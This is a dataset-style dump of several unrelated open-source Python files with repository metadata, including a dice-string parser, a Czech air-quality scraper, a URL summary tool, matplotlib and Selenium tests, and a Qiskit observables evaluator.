'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'key': list('ddeefff')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = times_two(add_one(t.a))
result = expr.execute()
expected = df.a.add(1.0).mul(2.0)
tm.assert_series_equal(expected, result)
| [
"cpcloud@gmail.com"
] | cpcloud@gmail.com |
5fad363ab88211dc685ce0fcd8f0c3dfbf84edfd | fb6e7922df3da2e9cdc37a00150d6d7663e907ff | /environment/rtfm/dynamics/dice.py | fbc50b78c60b350d2271d13d50dffc0476ae6757 | [
"Apache-2.0"
] | permissive | Spiph/GTG | c54a587002c42a032c89e8eceb5ec638f6c8c05f | 4a45032290d0c1364e4398684582c51094b245f5 | refs/heads/main | 2023-09-02T14:44:14.946624 | 2021-10-27T12:29:05 | 2021-10-27T12:29:05 | 393,086,007 | 0 | 0 | Apache-2.0 | 2021-08-05T15:09:07 | 2021-08-05T15:09:07 | null | UTF-8 | Python | false | false | 2,034 | py | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import random
class Dice:
def __init__(self):
pass
def roll(self):
raise NotImplementedError()
def describe(self):
raise NotImplementedError()
@classmethod
def from_str(cls, s):
dice = []
for sub in s.split('+'):
sub = sub.strip()
if 'd' not in sub:
constant = int(sub)
dice.append(ConstantDice(constant))
else:
splits = sub.split('d')
if len(splits) == 1:
num = 1
max_roll = splits[0]
elif len(splits) == 2:
num, max_roll = splits
if num == '':
num = 1
else:
raise Exception('could not parse dice string {} in main dice string {}'.format(sub, s))
dice.extend([SingleDice(max=int(max_roll)) for _ in range(int(num))])
return SumDice(dice) if len(dice) > 1 else dice[0]
class ConstantDice(Dice):
def __init__(self, constant):
super().__init__()
self.constant = self.max = constant
def roll(self):
return self.constant
def describe(self):
return repr(self.constant)
class SingleDice(Dice):
def __init__(self, max=20):
super().__init__()
self.max = max
def roll(self):
return random.randint(1, self.max)
def describe(self):
return 'd{}'.format(self.max)
class SumDice(Dice):
def __init__(self, subdice):
super().__init__()
self.sub = subdice
@property
def max(self):
return sum(d.max for d in self.sub)
def roll(self):
return sum(d.roll() for d in self.sub)
def describe(self):
return ' + '.join([d.describe() for d in self.sub])
| [
"jzyjiangzhengyao@gmail.com"
] | jzyjiangzhengyao@gmail.com |
bfb953ab310f302eb8ffded9021eab8dcf3d59c9 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/J/jindrichmynarz/air_pollution.py | 2f4733075ffae9ef96d3f49abd1b74a7777bbad3 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,030 | py | ####################################
# Informace o kvalitě ovzduší v ČR #
####################################
import datetime, re, scraperwiki, urlparse
from BeautifulSoup import BeautifulSoup
def getEvaluation(node):
evaluation = re.match(
"\d+(\.\d+)?",
node.find("span").text.encode("utf8").replace(",", ".").replace(" ", "")
)
if evaluation:
evaluation = evaluation.group()
else:
style = node["style"]
if style == "background-color: white":
evaluation = "Neúplná data"
elif style == "background-color: #CFCFCF":
evaluation = "Veličina se na uvedené stanici neměří"
else:
evaluation = ""
return evaluation
def reformatDate(text):
match = re.match(
"(?P<day>\d{2})\.(?P<month>\d{2})\.(?P<year>\d{4})\s+(?P<hours>\d{2}):(?P<minutes>\d{2})",
text
)
date = "{0[0]}-{0[1]}-{0[2]}T{0[3]}:{0[4]}:00+01:00".format(
map(match.group, ["year", "month", "day", "hours", "minutes"])
)
return date
def reformatCoords(text):
latitude, longitude = text.encode("utf-8").replace(" sš ", "N\n").replace(" vd", "E").replace("°", "").replace("´", "'").split("\n")
return latitude, longitude
def scrapeWeatherStation(url):
html = scraperwiki.scrape(url)
soup = BeautifulSoup(html)
tds = soup.find("table").findAll("td")
altitude = re.match("\d+", tds[-1].text).group()
latitude, longitude = reformatCoords(tds[-3].text)
return latitude, longitude, altitude
# Vytvoření záhlaví ukládaných dat
scraperwiki.sqlite.save_var(
"data_columns",
[
"code", "name", "owner",
"province", # Kraj
"latitude", "longitude", "altitude",
"time", "airquality", "SO2_1h",
"NO2_1h", "CO_1h", "O3_1h", "PM10_1h",
"PM10_24h"
]
)
# Získání stránky
startingUrl = "http://portal.chmi.cz/files/portal/docs/uoco/web_generator/actual_hour_data_CZ.html"
html = scraperwiki.scrape(startingUrl)
soup = BeautifulSoup(html)
# Najdi první tabulku
table = soup.find("table")
trs = table.findAll("tr")
for tr in trs:
ths = tr.findAll("th")
tds = tr.findAll("td")
rowSignature = (len(tds), len(ths))
if rowSignature == (0, 9):
th = tr.find("th")
province = th.text.replace("Kraj: ", "")
th = th.findNext().text
date = reformatDate(th)
elif rowSignature == (0, 10):
pass
elif rowSignature == (10, 1):
pass
elif rowSignature == (11, 0):
td = tr.find("td")
identifier = td.find("a")
code = identifier.text
weatherStationUrl = urlparse.urljoin(startingUrl, identifier["href"])
latitude, longitude, altitude = scrapeWeatherStation(weatherStationUrl)
td = td.findNext().findNext()
name = td.text
td = td.findNext()
owner = td.text
td = td.findNext()
airquality = getEvaluation(td)
td = td.findNext("td")
SO2_1h = getEvaluation(td)
td = td.findNext("td")
NO2_1h = getEvaluation(td)
td = td.findNext("td")
CO_1h = getEvaluation(td)
td = td.findNext("td")
O3_1h = getEvaluation(td)
td = td.findNext("td")
PM10_1h = getEvaluation(td)
td = td.findNext("td").findNext("td")
PM10_24h = getEvaluation(td)
scraperwiki.datastore.save(["code"], {
"code" : code,
"name" : name,
"owner" : owner,
"province" : province,
"latitude" : latitude,
"longitude" : longitude,
"altitude" : altitude,
"time" : date,
"airquality" : airquality,
"SO2_1h" : SO2_1h,
"NO2_1h" : NO2_1h,
"CO_1h" : CO_1h,
"O3_1h" : O3_1h,
"PM10_1h" : PM10_1h,
"PM10_24h" : PM10_24h,
}, date = datetime.datetime(*map(int, re.split('[^\d]', date)[:-2])))
else:
raise Exception
####################################
# Informace o kvalitě ovzduší v ČR #
####################################
import datetime, re, scraperwiki, urlparse
from BeautifulSoup import BeautifulSoup
def getEvaluation(node):
evaluation = re.match(
"\d+(\.\d+)?",
node.find("span").text.encode("utf8").replace(",", ".").replace(" ", "")
)
if evaluation:
evaluation = evaluation.group()
else:
style = node["style"]
if style == "background-color: white":
evaluation = "Neúplná data"
elif style == "background-color: #CFCFCF":
evaluation = "Veličina se na uvedené stanici neměří"
else:
evaluation = ""
return evaluation
def reformatDate(text):
match = re.match(
"(?P<day>\d{2})\.(?P<month>\d{2})\.(?P<year>\d{4})\s+(?P<hours>\d{2}):(?P<minutes>\d{2})",
text
)
date = "{0[0]}-{0[1]}-{0[2]}T{0[3]}:{0[4]}:00+01:00".format(
map(match.group, ["year", "month", "day", "hours", "minutes"])
)
return date
def reformatCoords(text):
latitude, longitude = text.encode("utf-8").replace(" sš ", "N\n").replace(" vd", "E").replace("°", "").replace("´", "'").split("\n")
return latitude, longitude
def scrapeWeatherStation(url):
html = scraperwiki.scrape(url)
soup = BeautifulSoup(html)
tds = soup.find("table").findAll("td")
altitude = re.match("\d+", tds[-1].text).group()
latitude, longitude = reformatCoords(tds[-3].text)
return latitude, longitude, altitude
# Vytvoření záhlaví ukládaných dat
scraperwiki.sqlite.save_var(
"data_columns",
[
"code", "name", "owner",
"province", # Kraj
"latitude", "longitude", "altitude",
"time", "airquality", "SO2_1h",
"NO2_1h", "CO_1h", "O3_1h", "PM10_1h",
"PM10_24h"
]
)
# Získání stránky
startingUrl = "http://portal.chmi.cz/files/portal/docs/uoco/web_generator/actual_hour_data_CZ.html"
html = scraperwiki.scrape(startingUrl)
soup = BeautifulSoup(html)
# Najdi první tabulku
table = soup.find("table")
trs = table.findAll("tr")
for tr in trs:
ths = tr.findAll("th")
tds = tr.findAll("td")
rowSignature = (len(tds), len(ths))
if rowSignature == (0, 9):
th = tr.find("th")
province = th.text.replace("Kraj: ", "")
th = th.findNext().text
date = reformatDate(th)
elif rowSignature == (0, 10):
pass
elif rowSignature == (10, 1):
pass
elif rowSignature == (11, 0):
td = tr.find("td")
identifier = td.find("a")
code = identifier.text
weatherStationUrl = urlparse.urljoin(startingUrl, identifier["href"])
latitude, longitude, altitude = scrapeWeatherStation(weatherStationUrl)
td = td.findNext().findNext()
name = td.text
td = td.findNext()
owner = td.text
td = td.findNext()
airquality = getEvaluation(td)
td = td.findNext("td")
SO2_1h = getEvaluation(td)
td = td.findNext("td")
NO2_1h = getEvaluation(td)
td = td.findNext("td")
CO_1h = getEvaluation(td)
td = td.findNext("td")
O3_1h = getEvaluation(td)
td = td.findNext("td")
PM10_1h = getEvaluation(td)
td = td.findNext("td").findNext("td")
PM10_24h = getEvaluation(td)
scraperwiki.datastore.save(["code"], {
"code" : code,
"name" : name,
"owner" : owner,
"province" : province,
"latitude" : latitude,
"longitude" : longitude,
"altitude" : altitude,
"time" : date,
"airquality" : airquality,
"SO2_1h" : SO2_1h,
"NO2_1h" : NO2_1h,
"CO_1h" : CO_1h,
"O3_1h" : O3_1h,
"PM10_1h" : PM10_1h,
"PM10_24h" : PM10_24h,
}, date = datetime.datetime(*map(int, re.split('[^\d]', date)[:-2])))
else:
raise Exception
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7b28757dca0e9585daaacf0aae60298e6545f140 | ebb63b057a82b8a10df305252cbcda4186ec02f7 | /taichi_blend/bundle-packages/melt/random_generator.py | b5cab4edc76ffef734527c01ec5d9bf5e01957b7 | [] | no_license | yjchoi1/taichi_blend | aa2d6f0129c8068b9a2c8bb5a7677b3c60923d5b | 907fdbee6027375324c9605ffc14db16e590f992 | refs/heads/master | 2023-03-21T12:31:04.126621 | 2021-03-01T15:06:13 | 2021-03-01T15:06:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from . import *
@A.register
class Def(IField):
'''
Name: random_generator
Category: sampler
Inputs: min:c max:c dim:i
Output: sample:f
'''
def __init__(self, min=0, max=1, dim=0):
self.min = min
self.max = max
self.dim = dim
@ti.func
def random(self):
return ti.random() * (self.max - self.min) + self.min
@ti.func
def _subscript(self, I):
if ti.static(self.dim == 0):
return self.random()
else:
return ti.Vector([self.random() for i in range(self.dim)])
| [
"1931127624@qq.com"
] | 1931127624@qq.com |
62bdf3e1d053de1b7c4bac023a257cd463d2a679 | d237e2624a30007bf8b1934057cd667f54245d40 | /url_summary/url_summary.py | 519893a361d74494357492e3d764243feefc29e2 | [
"MIT"
] | permissive | xidianwang412/url-summary | 8b64c6b374ecf155dd17de53c00eb4b9d2765177 | affb4a08d08d1c79d2df40cb318ae40d531e9583 | refs/heads/master | 2023-04-25T17:40:59.757519 | 2018-05-29T21:26:10 | 2018-05-29T21:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,826 | py | from collections import defaultdict
import random
from uuid import uuid4
from six.moves.urllib.parse import (
urlsplit, parse_qsl, ParseResult, urlunsplit, quote_plus)
from typing import Iterable
def get_summary(urls, top_items=20, top_urls=3, sample=True):
# type: (Iterable[str], int, int) -> UrlSummaryResult
""" Return a summary for given list or iterable of ``urls``.
``top_items`` (20 by default) controls how many top-level items to show,
and ``top_urls`` (3 by default) sets the number of random urls to show
for each top-level item.
Returns a UrlSummaryResult: a list subclass that has a nice
Jupyter Notebook display.
"""
index = defaultdict(list)
value_index = defaultdict(set)
for url in urls:
index['all', ''].append(url)
parsed = urlsplit(url) # type: ParseResult
index['netloc', format(parsed.netloc)].append(url)
path = parsed.path.rstrip('/').split('/')
for i in range(1, len(path)):
index['path start', '/'.join(path[: i + 1])].append(url)
for k, v in _parse_qsl(parsed.query or ''):
index['query key', '?{}'.format(k)].append(url)
value_index[k].add(v)
index['query key=value', '?{}={}'.format(k, v)].append(url)
items = sorted(index.items(), key=lambda x: (-len(x[1]), x[0]))
summary = []
for k, v in items[:top_items]:
stat = {'len': len(v), 'sample': sorted(_sample(v, top_urls, sample=sample))}
if k[0] == 'query key':
stat['len_v_set'] = len(value_index.get(k[1][1:]))
summary.append((k, stat))
return UrlSummaryResult(summary)
def _sample(lst, n, seed=42, sample=True):
if len(lst) <= n:
return lst
elif sample:
random.seed(seed)
return random.sample(lst, n)
else:
return lst[:n]
def _quote(s):
return quote_plus(s, safe='/')
def _parse_qsl(s):
return parse_qsl(s, keep_blank_values=True)
def _bold(x, bold=True):
return '<b style="color: black">{}</b>'.format(x) if bold else x
def _urlencode_quoted(x):
return '&'.join('{}={}'.format(k, v) for k, v in x)
class UrlSummaryResult(list):
def _repr_html_(self):
return '<ul>{}</ul>'.format(
'\n'.join(self._render_sample(field, value, stat)
for (field, value), stat in self))
def _render_sample(self, field, value, stat):
el_id = uuid4()
# Using "hidden" class defined by the Jupyter notebook
sample_elements = [self._render_url(url, field, value) for url in stat['sample']]
if stat['len'] > len(sample_elements):
sample_elements.append('…')
return '''\
<li>
<span href="#" style="cursor: pointer"
onclick="\
var el = document.getElementById('{id}'); \
this.getElementsByTagName('SPAN')[0].textContent = \
el.classList.contains('hidden') ? '▼' : '►'; \
el.classList.toggle('hidden')"
>{n:,} {field}: <b>{value}</b>{extra} <span>►</span></span>
<ul id="{id}" class="hidden" style="margin-top: 0">{sample}</ul>
</li>'''.format(
id=el_id,
n=stat['len'],
field=field,
value=value,
extra=(' ({len_v_set:,} unique values)'.format(**stat)
if 'len_v_set' in stat else ''),
sample='\n'.join('<li>{}</li>'.format(el) for el in sample_elements),
)
def _render_url(self, url, field, value):
return '<a href="{href}" target="_blank">{url}</a>'.format(
href=url, url=self._highlight(url, field, value))
def _highlight(self, url, field, value):
if field == 'all':
return url
parsed = urlsplit(url) # type: ParseResult
netloc = parsed.netloc
path = parsed.path
query = parsed.query
if field == 'netloc':
netloc = _bold(parsed.netloc)
elif field == 'path start':
s = len(value)
path = '{}{}'.format(_bold(parsed.path[1:s]), parsed.path[s:])
elif field == 'query key':
key_value = value[1:]
query = _urlencode_quoted(
[(_bold(_quote(k), k == key_value), _quote(v))
for k, v in _parse_qsl(query)])
elif field == 'query key=value':
key_value, value_value = value[1:].split('=', 1)
query = _urlencode_quoted(
[(_bold(_quote(k), bold), _bold(_quote(v), bold))
for bold, k, v in (
(k == key_value and v == value_value, k, v)
for k, v in _parse_qsl(query))])
return urlunsplit((parsed.scheme, netloc, path, query, parsed.fragment))
| [
"kostia.lopuhin@gmail.com"
] | kostia.lopuhin@gmail.com |
4620ec8b24a8b30d7078db3e41d39d5b8bd26563 | 449b3edf6ed1649f64f133533d6214f6679e6f2c | /customers/urls.py | 56177910b5e6f49a051e05a280b2230ab46e2888 | [
"MIT"
] | permissive | endonte/quotation2 | bbd82b0ab0ad524d19294e14bcc4752949cbbe03 | ddb9bf2f98ea8b45c9c43f272e61bb85fb563613 | refs/heads/master | 2021-01-15T14:19:36.476070 | 2017-08-21T07:20:07 | 2017-08-21T07:20:07 | 99,687,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from django.conf.urls import url
from .views import CustomerListView
urlpatterns = [
url(r'^$', CustomerListView.as_view(), name='customer_list'),
]
| [
"endonte88@gmail.com"
] | endonte88@gmail.com |
6885710c04ad189c6b12a2d576cb1720f585575d | 3ebed5d25b0f325736e435f03fb7cbf027a18da4 | /emc/memberArea/content/todo.py | e9aa77b5821b18022f4476034567cd627719d21f | [] | no_license | adam139/emc.memberArea | 82950eca452c781d0976d5f1c5c3140526f5823e | a549074240d780933cb590ce46c78bdecdbda654 | refs/heads/master | 2022-05-31T18:44:58.841750 | 2020-09-29T12:59:16 | 2020-09-29T12:59:16 | 47,908,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | #-*- coding: UTF-8 -*-
from plone.directives import form
class ITodo(form.Schema):
"""
emc project member area personal todo items container content type
"""
| [
"yuejun.tang@gmail.com"
] | yuejun.tang@gmail.com |
8eac734c22821c8104fc1c4200d29219a39df2d8 | 0c955ea058eae749695835b31d07f60775631f36 | /test_plots/test_patches.py | cbcab29018475b5a3089ff91f30d532cf115c260 | [
"BSD-3-Clause"
] | permissive | Ahmed/mpld3 | f75934ee5e0da196eb4440f19b54cbf9dab58d0c | edb9c82e1555b778adea932a55b51ca6dc3de6e4 | refs/heads/master | 2020-12-07T00:33:17.193173 | 2014-04-02T09:39:22 | 2014-04-02T09:39:22 | 18,023,559 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | """Plot to test patches"""
import matplotlib.pyplot as plt
from matplotlib import patches
import numpy as np
def main():
fig, ax = plt.subplots()
ax.grid(color='lightgray')
rcolor = lambda: np.random.random(3)
p = [patches.Arrow(0.75, 0.75, 0.5, 0.5),
patches.Circle((1, 2), 0.4),
patches.RegularPolygon((1, 3), 5, 0.4),
patches.Rectangle((1.6, 0.75), 0.8, 0.5),
patches.CirclePolygon((2, 2), 0.4),
patches.Polygon([[1.75, 3], [2, 3.25], [2.25, 3],
[2, 2.75], [1.75, 3]]),
patches.Wedge((3, 1), 0.4, 0, 270),
patches.Ellipse((3, 2), 0.6, 0.4),
patches.Arc((3, 3), 0.5, 0.5, 270, 90),
]
for patch in p:
patch.set_facecolor(rcolor())
patch.set_edgecolor(rcolor())
patch.set_alpha(0.5)
patch.set_linewidth(2)
ax.add_patch(patch)
# add a static patch
ax.add_patch(patches.Rectangle((0.3, 0.4), 0.4, 0.4,
fc='yellow', ec='black', alpha=0.3,
transform=ax.transAxes))
# make sure axes ratio is equal
ax.set_xlim(0.5, 0.5 + 3. * 4. / 3.)
ax.set_ylim(0.5, 3.5)
ax.set_title("Various Patches", size=16)
return fig
if __name__ == '__main__':
main()
plt.show()
| [
"vanderplas@astro.washington.edu"
] | vanderplas@astro.washington.edu |
9e9053f992d74ab70ebb2bf5c40292d1251d11e6 | 60ff82c168f247728fa88ca8e748b61876d6b5c3 | /Chrome/GuestUser/ExploreCompaniesPage/TopSection/Test_SecondHeadline.py | bbf4c1031950ca663d8ae51e6b3461ec5d0fbfb5 | [] | no_license | mariana-rusu/the.muse | 2b9bee8a7740c3f305463cbfc28ebd3bacd49907 | 58434e3ad45795cb980aca8d6b5c67132b8a855c | refs/heads/master | 2021-01-12T07:33:04.831570 | 2017-01-09T21:02:52 | 2017-01-09T21:02:52 | 76,977,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | from selenium import webdriver
import unittest
import time
class SecondHeadline(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.maximize_window()
self.driver.get("https://www.themuse.com/")
time.sleep(1)
explore_companies = self.driver.find_element_by_xpath("/html/body/header/nav[2]/a[1]")
explore_companies.click()
def test_Headline_is_found(self):
driver = self.driver
assert (driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2"))
def test_Headline_text_is_found(self):
driver = self.driver
element = driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2")
self.assertEqual(element.text,"Browse offices before you apply.")
def tearDown(self):
self.driver.quit() | [
"mirabelia@yahoo.com"
] | mirabelia@yahoo.com |
95f800ba3a4d4c934ae6e706cea07edfc6d46be1 | e233f9bf52ad0f88416962edd957a3c866c19b78 | /reagent/test/base/horizon_test_base.py | 676c00c95aa0b12b78c937e5cb05f5420ff12268 | [
"BSD-3-Clause"
] | permissive | dwtcourses/ReAgent | 38c99dfe47adf1471620419f744cb4145f4f4151 | b9b54d4f30ff65cf1c54dc0cf90c938b48c44f90 | refs/heads/master | 2022-04-26T15:35:46.109984 | 2020-04-29T05:38:14 | 2020-04-29T05:40:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from reagent.tensorboardX import SummaryWriterContext
class HorizonTestBase(unittest.TestCase):
def setUp(self):
SummaryWriterContext._reset_globals()
def tearDown(self):
SummaryWriterContext._reset_globals()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
48ca418ae561d715421faaa683c95b01c751cfac | 7c5304c697f858147f5a6655eef814bc32872848 | /setup.py | 6d00328ae8f4d9c7e715cc77af03403589f75a1e | [
"MIT",
"BSD-2-Clause"
] | permissive | MadisKarli/pyJuliusAlign | 2d5e644363f20cbe1265bb183df79724e12963e4 | 2e2a9951e7599f5dc83a977bc6605c515afec253 | refs/heads/master | 2022-01-06T00:37:29.734312 | 2019-02-23T23:42:37 | 2019-02-23T23:42:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | #!/usr/bin/env python
# encoding: utf-8
'''
Created on Aug 29, 2014
@author: tmahrt
'''
from setuptools import setup
import io
setup(name='pyjuliusalign',
version='2.0.3',
author='Tim Mahrt',
author_email='timmahrt@gmail.com',
url='https://github.com/timmahrt/pyJuliusAlign',
package_dir={'pyjuliusalign': 'pyjuliusalign'},
packages=['pyjuliusalign'],
package_data={'pyjuliusalign': ["hiraganaChart.txt", "katakanaChart.txt"]},
license='LICENSE',
description='A helper library for doing forced-alignment in Japanese with Julius.',
long_description=io.open('README.md', 'r', encoding="utf-8").read(),
long_description_content_type='text/markdown',
)
| [
"timmahrt@gmail.com"
] | timmahrt@gmail.com |
dad36b398af2b8faf8d022d56955587525f59b3b | 1ba2b4a507783eb2051887b9ecbed85d87e4c16b | /qiskit/algorithms/aux_ops_evaluator.py | 9ce9349a7de8f236e92d1aadf7ead38d663f97ec | [
"Apache-2.0"
] | permissive | manoelmarques/qiskit-terra | 34a948605d98168b1344cee1fd6adc117a137f25 | 71dd7f7b9603e1991f9d97fef66bb9b63d552c91 | refs/heads/main | 2023-04-30T08:42:15.886082 | 2023-02-15T21:58:01 | 2023-02-15T21:58:01 | 228,042,086 | 0 | 0 | Apache-2.0 | 2019-12-14T15:07:03 | 2019-12-14T15:07:02 | null | UTF-8 | Python | false | false | 7,407 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Evaluator of auxiliary operators for algorithms."""
from typing import Tuple, Union, List
import numpy as np
from qiskit import QuantumCircuit
from qiskit.opflow import (
CircuitSampler,
ListOp,
StateFn,
OperatorBase,
ExpectationBase,
)
from qiskit.providers import Backend
from qiskit.quantum_info import Statevector
from qiskit.utils import QuantumInstance
from qiskit.utils.deprecation import deprecate_function
from .list_or_dict import ListOrDict
@deprecate_function(
"The eval_observables function has been superseded by the "
"qiskit.algorithms.observables_evaluator.estimate_observables function. "
"This function will be deprecated in a future release and subsequently "
"removed after that.",
category=PendingDeprecationWarning,
)
def eval_observables(
quantum_instance: Union[QuantumInstance, Backend],
quantum_state: Union[
Statevector,
QuantumCircuit,
OperatorBase,
],
observables: ListOrDict[OperatorBase],
expectation: ExpectationBase,
threshold: float = 1e-12,
) -> ListOrDict[Tuple[complex, complex]]:
"""
Pending deprecation: Accepts a list or a dictionary of operators and calculates
their expectation values - means
and standard deviations. They are calculated with respect to a quantum state provided. A user
can optionally provide a threshold value which filters mean values falling below the threshold.
This function has been superseded by the
:func:`qiskit.algorithms.observables_evaluator.eval_observables` function.
It will be deprecated in a future release and subsequently
removed after that.
Args:
quantum_instance: A quantum instance used for calculations.
quantum_state: An unparametrized quantum circuit representing a quantum state that
expectation values are computed against.
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
expectation: An instance of ExpectationBase which defines a method for calculating
expectation values.
threshold: A threshold value that defines which mean values should be neglected (helpful for
ignoring numerical instabilities close to 0).
Returns:
A list or a dictionary of tuples (mean, standard deviation).
Raises:
ValueError: If a ``quantum_state`` with free parameters is provided.
"""
if (
isinstance(
quantum_state, (QuantumCircuit, OperatorBase)
) # Statevector cannot be parametrized
and len(quantum_state.parameters) > 0
):
raise ValueError(
"A parametrized representation of a quantum_state was provided. It is not "
"allowed - it cannot have free parameters."
)
# Create new CircuitSampler to avoid breaking existing one's caches.
sampler = CircuitSampler(quantum_instance)
list_op = _prepare_list_op(quantum_state, observables)
observables_expect = expectation.convert(list_op)
observables_expect_sampled = sampler.convert(observables_expect)
# compute means
values = np.real(observables_expect_sampled.eval())
# compute standard deviations
std_devs = _compute_std_devs(
observables_expect_sampled, observables, expectation, quantum_instance
)
# Discard values below threshold
observables_means = values * (np.abs(values) > threshold)
# zip means and standard deviations into tuples
observables_results = list(zip(observables_means, std_devs))
# Return None eigenvalues for None operators if observables is a list.
# None operators are already dropped in compute_minimum_eigenvalue if observables is a dict.
return _prepare_result(observables_results, observables)
def _prepare_list_op(
quantum_state: Union[
Statevector,
QuantumCircuit,
OperatorBase,
],
observables: ListOrDict[OperatorBase],
) -> ListOp:
"""
Accepts a list or a dictionary of operators and converts them to a ``ListOp``.
Args:
quantum_state: An unparametrized quantum circuit representing a quantum state that
expectation values are computed against.
observables: A list or a dictionary of operators.
Returns:
A ``ListOp`` that includes all provided observables.
"""
if isinstance(observables, dict):
observables = list(observables.values())
if not isinstance(quantum_state, StateFn):
quantum_state = StateFn(quantum_state)
return ListOp([StateFn(obs, is_measurement=True).compose(quantum_state) for obs in observables])
def _prepare_result(
observables_results: List[Tuple[complex, complex]],
observables: ListOrDict[OperatorBase],
) -> ListOrDict[Tuple[complex, complex]]:
"""
Prepares a list or a dictionary of eigenvalues from ``observables_results`` and
``observables``.
Args:
observables_results: A list of of tuples (mean, standard deviation).
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
Returns:
A list or a dictionary of tuples (mean, standard deviation).
"""
if isinstance(observables, list):
observables_eigenvalues = [None] * len(observables)
key_value_iterator = enumerate(observables_results)
else:
observables_eigenvalues = {}
key_value_iterator = zip(observables.keys(), observables_results)
for key, value in key_value_iterator:
if observables[key] is not None:
observables_eigenvalues[key] = value
return observables_eigenvalues
def _compute_std_devs(
observables_expect_sampled: OperatorBase,
observables: ListOrDict[OperatorBase],
expectation: ExpectationBase,
quantum_instance: Union[QuantumInstance, Backend],
) -> List[complex]:
"""
Calculates a list of standard deviations from expectation values of observables provided.
Args:
observables_expect_sampled: Expected values of observables.
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
expectation: An instance of ExpectationBase which defines a method for calculating
expectation values.
quantum_instance: A quantum instance used for calculations.
Returns:
A list of standard deviations.
"""
variances = np.real(expectation.compute_variance(observables_expect_sampled))
if not isinstance(variances, np.ndarray) and variances == 0.0:
# when `variances` is a single value equal to 0., our expectation value is exact and we
# manually ensure the variances to be a list of the correct length
variances = np.zeros(len(observables), dtype=float)
std_devs = np.sqrt(variances / quantum_instance.run_config.shots)
return std_devs
| [
"noreply@github.com"
] | manoelmarques.noreply@github.com |
5d268dd6a1d73ac3491ec9214064db7e76186d8e | f6db8d85a3b41eed543959314d65927353a8229c | /.history/W5/restaurant/forms_20201202155445.py | 54887e8fa52493f1ec9492f492ded07847b4da12 | [] | no_license | NFEL/DjangoPaeez99 | d573cc8e36500f08bc104d76f7a2628062d86c2f | 621636bfb47d71f2a4f45037b7264dd5ebc7cdd7 | refs/heads/main | 2023-01-27T22:05:57.788049 | 2020-12-08T10:08:28 | 2020-12-08T10:08:28 | 304,553,353 | 1 | 2 | null | 2020-10-16T07:33:04 | 2020-10-16T07:33:03 | null | UTF-8 | Python | false | false | 219 | py | from django import forms
# from django.db.models import fields
from .models import ElementAddress
class NearByReastaurants(forms.ModelForm):
class Meta:
model = ElementAddress
fields = ('element',) | [
"nfilsaraee@gmail.com"
] | nfilsaraee@gmail.com |
54fac0e0c625b35779f704ceba5b0921fa2f22a7 | 74faed0c7465e7fa629400ddfdcfd58f66a6d6e3 | /manage.py | 2b0a775b4b720d0487a55eea64bf1dabb56717ae | [] | no_license | dengshilong/test-flask | 5952dc28d39588705f71bc87cba6c50fcb959e92 | 847c51ea524e6ffde211ca41c82f21997cf02899 | refs/heads/master | 2021-01-19T20:08:01.744585 | 2017-04-17T09:17:22 | 2017-04-17T09:17:22 | 88,488,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | #!/usr/bin/env python
# pylint: disable=wrong-import-position
import os
from test_flask import create_app, db
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
from test_flask.models import User, Address
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)
def make_shell_context():
return dict(app=app, db=db, User=User, Address=Address)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
@manager.command
def test():
"""Run the unit tests."""
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
if __name__ == '__main__':
manager.run()
| [
"dengshilong1988@gmail.com"
] | dengshilong1988@gmail.com |
37dee3f1ada38b2abb4fe10458182260e4944d89 | a045c20593669cbb82395e58dc116154d5c6c86b | /stalker_hud_rig_helper/ui.py | 869ecbe3aee0c3af278fed8ba20c965e1b6658e9 | [] | no_license | PavelBlend/blender-stalker-hud-rig-helper-addon | 4eba43cf49c1b815048d54ad1205456e9ea3eb92 | 6ebeabbca92788cdb70f4cb286bf6f5b6e47b014 | refs/heads/master | 2020-06-04T20:23:39.285879 | 2019-06-16T09:38:18 | 2019-06-16T09:38:18 | 192,179,043 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,584 | py | import bpy
